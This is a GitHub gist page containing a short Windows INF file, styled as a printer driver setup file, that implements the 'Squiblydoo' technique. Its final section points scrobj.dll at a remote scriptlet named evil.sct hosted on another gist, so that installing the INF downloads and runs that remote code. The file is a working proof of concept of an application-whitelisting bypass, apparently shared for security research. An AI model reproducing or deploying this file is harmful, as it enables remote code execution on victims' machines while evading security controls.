Skip to content

Instantly share code, notes, and snippets.

@fareedfauzi
Last active December 30, 2019 09:03
Show Gist options
  • Save fareedfauzi/1565d618453258484575ebc98d953f5a to your computer and use it in GitHub Desktop.
Save fareedfauzi/1565d618453258484575ebc98d953f5a to your computer and use it in GitHub Desktop.
INF file
; ----------------------------------------------------------------------
; Required Sections
; ----------------------------------------------------------------------
[Version]
Signature=$CHICAGO$
Provider=test
Class=Printer
[Manufacturer]
HuntressLabs=ModelsSection,NTx86,NTia64,NTamd64
; ----------------------------------------------------------------------
; Models Section
; ----------------------------------------------------------------------
[ModelsSection.NTx86]
UnregisterDlls = Squiblydoo
[ModelsSection.NTia64]
UnregisterDlls = Squiblydoo
[ModelsSection.NTamd64]
UnregisterDlls = Squiblydoo
; ----------------------------------------------------------------------
; Support Sections
; ----------------------------------------------------------------------
[DefaultInstall]
UnregisterDlls = Squiblydoo
[Squiblydoo]
11,,scrobj.dll,2,60,https://gist.githubusercontent.com/fareedfauzi/415eb13973fa0a0f39dce7b5576fc53f/raw/393f46c685ee072357b7aef3ae4893b1e276e2f8/evil.sct
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment